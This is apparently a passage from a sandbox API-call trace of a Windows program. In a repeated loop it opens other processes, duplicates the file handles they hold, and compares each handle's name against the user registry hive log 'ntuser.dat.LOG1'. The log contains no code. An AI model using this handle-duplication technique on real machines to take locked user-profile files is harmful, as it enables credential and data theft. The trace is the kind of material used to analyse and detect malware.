hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.880] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.880] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.881] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.881] CloseHandle (hObject=0x1e4) returned 1 [0161.881] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.881] CloseHandle (hObject=0x194) returned 1 [0161.881] CloseHandle (hObject=0x1e8) returned 1 [0161.881] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9c0) returned 0x1e8 [0161.881] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.881] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.882] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.883] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.883] CloseHandle (hObject=0x1e4) returned 1 [0161.883] _wcsicmp (_Str1="\\Microsoft SQL Server Compact Edition", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.883] CloseHandle (hObject=0x194) returned 1 [0161.883] CloseHandle (hObject=0x1e8) returned 1 [0161.883] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9d0) returned 0x1e8 [0161.883] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.883] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.884] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.885] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.885] CloseHandle (hObject=0x1e4) returned 1 [0161.885] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.885] CloseHandle (hObject=0x194) returned 1 [0161.885] CloseHandle (hObject=0x1e8) returned 1 [0161.885] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9d0) returned 0x1e8 [0161.885] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.885] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.886] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.887] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.887] CloseHandle (hObject=0x1e4) returned 1 [0161.887] _wcsicmp (_Str1="\\Microsoft Sync Framework", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.887] CloseHandle (hObject=0x194) returned 1 [0161.887] CloseHandle (hObject=0x1e8) returned 1 [0161.887] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9d0) returned 0x1e8 [0161.887] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x7c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.887] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.888] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.889] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.889] CloseHandle (hObject=0x1e4) returned 1 [0161.889] _wcsicmp (_Str1="\\StaticCache.dat", _Str2="\\ntuser.dat.LOG1") returned 5 [0161.889] CloseHandle (hObject=0x194) returned 1 [0161.889] CloseHandle (hObject=0x1e8) returned 1 [0161.889] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9e0) returned 0x1e8 [0161.889] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.889] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.890] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.890] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.890] CloseHandle (hObject=0x1e4) returned 1 [0161.891] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.891] CloseHandle (hObject=0x194) returned 1 [0161.891] CloseHandle (hObject=0x1e8) returned 1 [0161.891] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9e0) returned 0x1e8 [0161.891] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.891] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.892] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.893] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.893] CloseHandle (hObject=0x1e4) returned 1 [0161.893] _wcsicmp (_Str1="\\Windows Media Player", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.893] CloseHandle (hObject=0x194) returned 1 [0161.893] CloseHandle (hObject=0x1e8) returned 1 [0161.893] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9e0) returned 0x1e8 [0161.893] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x7c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.893] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.894] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.895] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.895] CloseHandle (hObject=0x1e4) returned 1 [0161.895] _wcsicmp (_Str1="\\StaticCache.dat", _Str2="\\ntuser.dat.LOG1") returned 5 [0161.895] CloseHandle (hObject=0x194) returned 1 [0161.895] CloseHandle (hObject=0x1e8) returned 1 [0161.895] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xa0c) returned 0x1e8 [0161.895] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.895] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.896] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.897] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.897] CloseHandle (hObject=0x1e4) returned 1 [0161.897] _wcsicmp (_Str1="\\System32", _Str2="\\ntuser.dat.LOG1") returned 5 [0161.897] CloseHandle (hObject=0x194) returned 1 [0161.897] CloseHandle (hObject=0x1e8) returned 1 [0161.897] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xa0c) returned 0x1e8 [0161.897] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xa8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.897] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.899] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.900] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.900] CloseHandle (hObject=0x1e4) returned 1 [0161.901] CloseHandle (hObject=0x194) returned 1 [0161.901] CloseHandle (hObject=0x1e8) returned 1 [0161.901] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xa0c) returned 0x1e8 [0161.901] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1ac, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.901] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.901] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.902] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.902] CloseHandle (hObject=0x1e4) returned 1 [0161.903] CloseHandle (hObject=0x194) returned 1 [0161.903] CloseHandle (hObject=0x1e8) returned 1 [0161.903] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xa0c) returned 0x1e8 [0161.903] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1b8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.903] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.904] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.905] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.905] CloseHandle (hObject=0x1e4) returned 1 [0161.905] CloseHandle (hObject=0x194) returned 1 [0161.905] CloseHandle (hObject=0x1e8) returned 1 [0161.905] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xa40) returned 0x1e8 [0161.905] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.905] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.906] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.907] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.907] CloseHandle (hObject=0x1e4) returned 1 [0161.907] _wcsicmp (_Str1="\\System32", _Str2="\\ntuser.dat.LOG1") returned 5 [0161.907] CloseHandle (hObject=0x194) returned 1 [0161.907] CloseHandle (hObject=0x1e8) returned 1 [0161.907] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xa40) returned 0x1e8 [0161.907] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xa8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.907] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.908] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.909] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.909] CloseHandle (hObject=0x1e4) returned 1 [0161.909] CloseHandle (hObject=0x194) returned 1 [0161.909] CloseHandle (hObject=0x1e8) returned 1 [0161.909] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xa40) returned 0x1e8 [0161.909] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1d8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.909] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.910] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.910] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.911] CloseHandle (hObject=0x1e4) returned 1 [0161.911] CloseHandle (hObject=0x194) returned 1 [0161.911] CloseHandle (hObject=0x1e8) returned 1 [0161.911] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xb7c) returned 0x1e8 [0161.911] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.911] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.911] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.912] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.912] CloseHandle (hObject=0x1e4) returned 1 [0161.912] _wcsicmp (_Str1="\\System32", _Str2="\\ntuser.dat.LOG1") returned 5 [0161.912] CloseHandle (hObject=0x194) returned 1 [0161.912] CloseHandle (hObject=0x1e8) returned 1 [0161.913] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xb7c) returned 0x1e8 [0161.913] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.913] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.913] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.914] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.914] CloseHandle (hObject=0x1e4) returned 1 [0161.914] CloseHandle (hObject=0x194) returned 1 [0161.914] CloseHandle (hObject=0x1e8) returned 1 [0161.915] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xb7c) returned 0x1e8 [0161.915] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x11c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.915] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.915] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.916] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.916] CloseHandle (hObject=0x1e4) returned 1 [0161.917] _wcsicmp (_Str1="\\RacMetaData.dat", _Str2="\\ntuser.dat.LOG1") returned 4 [0161.917] CloseHandle (hObject=0x194) returned 1 [0161.917] CloseHandle (hObject=0x1e8) returned 1 [0161.917] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xb7c) returned 0x1e8 [0161.917] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x130, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.917] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.918] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.919] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.919] CloseHandle (hObject=0x1e4) returned 1 [0161.919] _wcsicmp (_Str1="\\RacDatabase.sdf", _Str2="\\ntuser.dat.LOG1") returned 4 [0161.919] CloseHandle (hObject=0x194) returned 1 [0161.919] CloseHandle (hObject=0x1e8) returned 1 [0161.919] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xb7c) returned 0x1e8 [0161.919] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x160, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.919] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.920] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.920] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.920] CloseHandle (hObject=0x1e4) returned 1 [0161.920] _wcsicmp (_Str1="\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a", _Str2="\\ntuser.dat.LOG1") returned -13 [0161.921] CloseHandle (hObject=0x194) returned 1 [0161.921] CloseHandle (hObject=0x1e8) returned 1 [0161.921] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xb7c) returned 0x1e8 [0161.921] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.921] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.921] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.922] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.922] CloseHandle (hObject=0x1e4) returned 1 [0161.922] _wcsicmp (_Str1="\\KernelBase.dll.mui", _Str2="\\ntuser.dat.LOG1") returned -3 [0161.922] CloseHandle (hObject=0x194) returned 1 [0161.922] CloseHandle (hObject=0x1e8) returned 1 [0161.922] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xb7c) returned 0x1e8 [0161.922] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1b8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.922] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.923] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.924] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.924] CloseHandle (hObject=0x1e4) returned 1 [0161.924] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\ntuser.dat.LOG1") returned -13 [0161.924] CloseHandle (hObject=0x194) returned 1 [0161.924] CloseHandle (hObject=0x1e8) returned 1 [0161.924] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xb7c) returned 0x1e8 [0161.924] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2dc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.924] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.925] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.926] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.926] CloseHandle (hObject=0x1e4) returned 1 [0161.926] _wcsicmp (_Str1="\\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_08e61857a83bc251", _Str2="\\ntuser.dat.LOG1") returned -13 [0161.926] CloseHandle (hObject=0x194) returned 1 [0161.926] CloseHandle (hObject=0x1e8) returned 1 [0161.926] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xb7c) returned 0x1e8 [0161.926] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2e4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.926] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.927] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.928] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.928] CloseHandle (hObject=0x1e4) returned 1 [0161.928] _wcsicmp (_Str1="\\WinSATAPI.dll.mui", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.928] CloseHandle (hObject=0x194) returned 1 [0161.928] CloseHandle (hObject=0x1e8) returned 1 [0161.928] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xb7c) returned 0x1e8 [0161.928] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x334, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.928] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.929] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.929] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.930] CloseHandle (hObject=0x1e4) returned 1 [0161.930] _wcsicmp (_Str1="\\RacWmiDatabase.sdf", _Str2="\\ntuser.dat.LOG1") returned 4 [0161.930] CloseHandle (hObject=0x194) returned 1 [0161.930] CloseHandle (hObject=0x1e8) returned 1 [0161.930] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xb7c) returned 0x1e8 [0161.930] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x34c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.930] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.930] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.931] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.931] CloseHandle (hObject=0x1e4) returned 1 [0161.931] _wcsicmp (_Str1="\\sql96F1.tmp", _Str2="\\ntuser.dat.LOG1") returned 5 [0161.931] CloseHandle (hObject=0x194) returned 1 [0161.931] CloseHandle (hObject=0x1e8) returned 1 [0161.932] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xb7c) returned 0x1e8 [0161.932] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x370, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.932] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.932] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.933] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.933] CloseHandle (hObject=0x1e4) returned 1 [0161.933] _wcsicmp (_Str1="\\sql9702.tmp", _Str2="\\ntuser.dat.LOG1") returned 5 [0161.933] CloseHandle (hObject=0x194) returned 1 [0161.933] CloseHandle (hObject=0x1e8) returned 1 [0161.933] 